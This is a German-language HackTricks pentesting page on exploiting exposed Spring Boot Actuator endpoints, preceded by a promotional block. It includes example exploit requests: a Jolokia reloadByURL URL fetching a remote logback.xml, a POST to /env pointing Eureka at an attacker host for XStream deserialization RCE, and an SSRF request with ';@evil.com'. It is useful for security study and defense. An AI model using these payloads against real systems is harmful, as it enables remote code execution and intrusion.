hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

# Spring Actuators

<details>

<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere Möglichkeiten, HackTricks zu unterstützen:

* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.

</details>

## **Spring Auth Bypass**

<figure><img src="../../.gitbook/assets/image (927).png" alt=""><figcaption></figcaption></figure>

**Von** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*

## Ausnutzen von Spring Boot Actuators

**Überprüfen Sie den Originalbeitrag von** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]

### **Schlüsselpunkte:**

* Spring Boot Actuators registrieren Endpunkte wie `/health`, `/trace`, `/beans`, `/env` usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind standardmäßig nur `/health` und `/info` nicht sensitiv, aber Entwickler deaktivieren diese Sicherheit oft.
* Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
* `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` und `/heapdump`.
* In Spring Boot 1.x sind Actuators unter der Stamm-URL registriert, während sie in 2.x unter dem Basispfad `/actuator/` stehen.

### **Ausbeutungstechniken:**

1. **Remote Code Execution über '/jolokia'**:
* Der `/jolokia`-Actuator-Endpunkt gibt die Jolokia-Bibliothek frei, die HTTP-Zugriff auf MBeans ermöglicht.
* Die Aktion `reloadByURL` kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über speziell erstellte XML-Konfigurationen führen kann.
* Beispiel-Exploit-URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Konfigurationsänderung über '/env'**:
* Wenn Spring Cloud Libraries vorhanden sind, ermöglicht der Endpunkt `/env` die Änderung von Umgebungseigenschaften.
* Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie die XStream-Deserialisierungsschwachstelle im Eureka-ServiceURL.
* Beispiel-Exploit-POST-Anfrage:

```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Weitere nützliche Einstellungen**:
* Eigenschaften wie `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` und `spring.datasource.tomcat.max-active` können für verschiedene Exploits manipuliert werden, wie SQL-Injection oder Änderung von Datenbankverbindungszeichenfolgen.

### **Zusätzliche Informationen:**

* Eine umfassende Liste der Standard-Actuators finden Sie [hier](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
* Der Endpunkt `/env` in Spring Boot 2.x verwendet JSON-Format für die Eigenschaftsänderung, aber das allgemeine Konzept bleibt dasselbe.

### **Verwandte Themen:**

1. **Env + H2 RCE**:
* Details zur Ausnutzung der Kombination aus `/env`-Endpunkt und H2-Datenbank finden Sie [hier](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF auf Spring Boot durch falsche Interpretation des Pfadnamens**:
* Die Behandlung von Matrixparametern (`;`) im HTTP-Pfadnamen des Spring-Frameworks kann für Server-seitige Anfragenfälschung (SSRF) ausgenutzt werden.
* Beispiel-Exploit-Anfrage:

```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```